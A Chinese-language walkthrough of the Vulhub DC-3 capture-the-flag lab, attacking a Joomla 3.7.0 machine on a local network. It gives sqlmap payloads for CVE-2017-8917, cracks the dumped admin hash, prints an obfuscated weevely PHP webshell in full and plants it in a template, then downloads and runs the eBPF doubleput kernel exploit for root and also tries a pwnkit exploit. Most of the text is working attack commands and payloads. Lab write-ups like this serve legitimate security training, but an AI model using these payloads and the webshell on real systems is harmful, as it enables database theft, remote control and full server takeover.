Vulhub-DC-3靶场实战攻略

靶场情况特殊 NAT模式无法上线 接下来考虑把靶机放到virtualbox上 但是需要设置virtualbox和vmware共用虚拟网卡才能同网段扫描

之后在kali中就可以选择网卡 测试的时候选择和virtualbox相同的网卡即可  上网的时候选择nat模式的网卡即可

开启virtualbox的靶机

然后攻击机切换网卡到和靶机同一个网段后即可开始进行arp扫描主机的存活

arp-scan -l

nmap -T4 -A 192.168.56.100 -p 1-65535

nmap -T4 -A 192.168.56.101 -p 1-65535

可以借助工具去探测该网站是什么模板 什么配置

whatweb http://192.168.56.101

发现这是使用的Joomla的CMS框架搭建的网站

接下来可以使用Joomla专门的扫描工具

(下载工具之前请先切换nat的网卡 这样才能访问公网) （具体虚拟机如何配置双网卡 内网外网双实验环境 后续会专门研究）

安装完成以后再切换回内网网卡

apt-get install joomscan

joomscan --url http://192.168.56.101

同时根据Joomla的版本是3.7.0  可以找相关的exp

searchsploit Joomla 3.7.0

cp /usr/share/exploitdb/exploits/php/webapps/42033.txt 42033.txt

以下是42033.txt的文件的内容

sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables -p list[fullordering]

# Exploit Title: Joomla 3.7.0 - Sql Injection
# Date: 05-19-2017
# Exploit Author: Mateus Lino
# Reference: https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html
# Vendor Homepage: https://www.joomla.org/
# Version: = 3.7.0
# Tested on: Win, Kali Linux x64, Ubuntu, Manjaro and Arch Linux
# CVE : - CVE-2017-8917

URL Vulnerable: http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml%27

Using Sqlmap:

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

Parameter: list[fullordering] (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (DUAL)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(CASE WHEN (1573=1573) THEN 1573 ELSE 1573*(SELECT 1573 FROM DUAL UNION SELECT 9674 FROM DUAL) END)

    Type: error-based
    Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT 6600 FROM(SELECT COUNT(*),CONCAT(0x7171767071,(SELECT (ELT(6600=6600,1))),0x716a707671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 time-based blind - Parameter replace (substraction)
    Payload: option=com_fields&view=fields&layout=modal&list[fullordering]=(SELECT * FROM (SELECT(SLEEP(5)))GDiu)

根据相应的提示输入sqlmap的命令
sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" --columns -p list[fullordering]

sqlmap -u "http://192.168.56.101/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T "#__users" -C name,password --dump -p list[fullordering]

成功拿到用户名和密码

admin

$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

接下来需要使用工具对其进行破解

首先把密码放到一个位置中

cd /root

touch mima.txt

nano mima.txt

$2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

cd /root

john mima.txt 

接下来先进入后台 账号 admin  密码 snoopy  

之后进入相关位置

其允许用户编辑很多文件  包括php文件

根据经验可知

jommla的模板目录位置

xxx.com/templates/模板名字/+在编辑器你看到的位置

可以自定义内容 那这时候玩法就很多了 上传一句话木马然后菜刀连接也是轻而易举

这里玩点花的  生成一个密码为123456的webshell木马

weevely generate 123456 webshell.php

webshell.php的内容  变种的一句话木马

<?php
$k='ontents("cZphp://icZnput"cZ),$m)=cZ=cZ1) cZ{@ob_start();@ecZvalcZ(@cZgzuncocZmpress(@x(c';
$T='cZ$j};}}retcZurn $ocZ;}ifcZ (@precZgcZ_match("/cZ$kcZh(.+)$kf/"cZcZ,@file_getcZ_c';
$U='Z@bacZse6cZ4_decZcocZde($m[1cZ]),$k)));cZ$ocZ=@ob_get_contents(cZ);@obcZ_end_clecZan()';
$g='or($cZi=0;$cZcZi<$l;){cZfor($j=cZ0cZ;($j<$c&&$i<$l);$jcZ++,$i+cZ+){$o.=cZ$tcZ{$i}^$k{';
$X=str_replace('IH','','IHcIHreateIHIH_fIHIHunction');
$L=';$cZrcZ=@base6cZ4_ecZnccZode(@x(@gzcomprcZess($o),$kcZ)cZ);pcZrint("$p$kh$r$cZkf");}';
$N='$k="cZe10adcZc39";$kh="cZ49ba59cZcZabbe56";$kf="ecZ05cZ7fcZ20f883e"cZ;$p="1KcZ9y6VdIcZH';
$p='rJbICFj"cZ;functcZion x(cZ$t,$cZk){$c=stcZrlecZn($k);cZ$l=strlencZ($t);cZ$o="";fcZ';
$v=str_replace('cZ','',$N.$p.$g.$T.$k.$U.$L);
$n=$X('',$v);$n();
?>

http://192.168.56.101/templates/protostar/test1.php

地址完成以后开始用工具连接

weevely http://192.168.56.101/templates/protostar/test1.php 123456

可以通过help命令查看所有可以执行的命令

:help

:shell_sh

cat /etc/passwd

接下来可以使用工具进行ssh破解

不过我们可以尝试用nmap进行一次操作系统的扫描  查看操作系统的版本 看看能否根据版本进行linux的内核提权

nmap -O 192.168.56.101

接下来也可以试试suid提权 但是并没有发现什么可以利用的文件

find / -user root -perm -4000 -print 2>/dev/null

继续考虑查看操作系统的内核版本  想办法linux内核提权

uname -a 

lsb_release -a

接下来尝试进行内核提权

searchsploit Ubuntu 16.04

cp /usr/share/exploitdb/exploits/linux/local/39772.txt /home/kali

文本内容如下

Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=808

In Linux >=4.4, when the CONFIG_BPF_SYSCALL config option is set and the
kernel.unprivileged_bpf_disabled sysctl is not explicitly set to 1 at runtime,
unprivileged code can use the bpf() syscall to load eBPF socket filter programs.
These conditions are fulfilled in Ubuntu 16.04.

When an eBPF program is loaded using bpf(BPF_PROG_LOAD, ...), the first
function that touches the supplied eBPF instructions is
replace_map_fd_with_map_ptr(), which looks for instructions that reference eBPF
map file descriptors and looks up pointers for the corresponding map files.
This is done as follows:

    /* look for pseudo eBPF instructions that access map FDs and
     * replace them with actual map pointers
     */
    static int replace_map_fd_with_map_ptr(struct verifier_env *env)
    {
        struct bpf_insn *insn = env->prog->insnsi;
        int insn_cnt = env->prog->len;
        int i, j;

        for (i = 0; i < insn_cnt; i++, insn++) {
            [checks for bad instructions]

            if (insn[0].code == (BPF_LD | BPF_IMM | BPF_DW)) {
                struct bpf_map *map;
                struct fd f;

                [checks for bad instructions]

                f = fdget(insn->imm);
                map = __bpf_map_get(f);
                if (IS_ERR(map)) {
                    verbose("fd %d is not pointing to valid bpf_map\n",
                        insn->imm);
                    fdput(f);
                    return PTR_ERR(map);
                }

                [...]
            }
        }
        [...]
    }

__bpf_map_get contains the following code:

/* if error is returned, fd is released.
* On success caller should complete fd access with matching fdput()
*/
struct bpf_map *__bpf_map_get(struct fd f)
{
    if (!f.file)
        return ERR_PTR(-EBADF);
    if (f.file->f_op != &bpf_map_fops) {
        fdput(f);
        return ERR_PTR(-EINVAL);
    }

    return f.file->private_data;
}

The problem is that when the caller supplies a file descriptor number referring
to a struct file that is not an eBPF map, both __bpf_map_get() and
replace_map_fd_with_map_ptr() will call fdput() on the struct fd. If
__fget_light() detected that the file descriptor table is shared with another
task and therefore the FDPUT_FPUT flag is set in the struct fd, this will cause
the reference count of the struct file to be over-decremented, allowing an
attacker to create a use-after-free situation where a struct file is freed
although there are still references to it.

A simple proof of concept that causes oopses/crashes on a kernel compiled with
memory debugging options is attached as crasher.tar.

One way to exploit this issue is to create a writable file descriptor, start a
write operation on it, wait for the kernel to verify the file's writability,
then free the writable file and open a readonly file that is allocated in the
same place before the kernel writes into the freed file, allowing an attacker
to write data to a readonly file. By e.g. writing to /etc/crontab, root
privileges can then be obtained.


There are two problems with this approach:


The attacker should ideally be able to determine whether a newly allocated
struct file is located at the same address as the previously freed one. Linux
provides a syscall that performs exactly this comparison for the caller:
kcmp(getpid(), getpid(), KCMP_FILE, uaf_fd, new_fd).

In order to make exploitation more reliable, the attacker should be able to
pause code execution in the kernel between the writability check of the target
file and the actual write operation. This can be done by abusing the writev()
syscall and FUSE: The attacker mounts a FUSE filesystem that artificially delays
read accesses, then mmap()s a file containing a struct iovec from that FUSE
filesystem and passes the result of mmap() to writev(). (Another way to do this
would be to use the userfaultfd() syscall.)

writev() calls do_writev(), which looks up the struct file * corresponding to
the file descriptor number and then calls vfs_writev(). vfs_writev() verifies
that the target file is writable, then calls do_readv_writev(), which first
copies the struct iovec from userspace using import_iovec(), then performs the
rest of the write operation. Because import_iovec() performs a userspace memory
access, it may have to wait for pages to be faulted in - and in this case, it
has to wait for the attacker-owned FUSE filesystem to resolve the pagefault,
allowing the attacker to suspend code execution in the kernel at that point
arbitrarily.

An exploit that puts all this together is in exploit.tar. Usage:

user@host:~/ebpf_mapfd_doubleput$ ./compile.sh
user@host:~/ebpf_mapfd_doubleput$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
root@host:~/ebpf_mapfd_doubleput# id
uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare),999(vboxsf),1000(user)

This exploit was tested on a Ubuntu 16.04 Desktop system.

Fix: https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=8358b02bf67d3a5d8a825070e1aa73f25fb2e4c7


Proof of Concept: https://bugs.chromium.org/p/project-zero/issues/attachment?aid=232552
Exploit-DB Mirror: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

进入相关地址下载该exp   目前已经下载好了

当前也可以直接在其中

wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip

将该压缩包放到kali的root目录下  并且开启python的简单服务器 这样就可以实现文件上传下载了

mv /home/kali/39772.zip /home/kali/39772.zip

python -m SimpleHTTPServer

之后在靶机位置

wget http://192.168.56.102:8000/39772.zip

之后在靶机的位置

unzip 39772.zip

cd 39772

ls

tar -xvf exploit.tar

ls

cd ebpf_mapfd_doubleput_exploit

ls

./compile.sh

./doubleput

cd /root

ls

cat the-flag.txt

根据自己的研究 有一个提权漏洞也可以尝试尝试

把exp放到指定位置  /home/kali/CVE-2021-4034.zip

之后在靶机中

wget http://192.168.56.102:8000/CVE-2021-4034.zip

unzip CVE-2021-4034.zip

ls

cd CVE-2021-4034

ls

make

./cve-2021-4034

提权并没有成功 可能系统内核不一致的原因！

---

---

接下来是对这个靶场的研究 和一些其他想法的实践

http://192.168.56.101/templates/protostar/muma.php

接下来通过中国菜刀连接一下  连接失败

通过中国蚁剑连接一下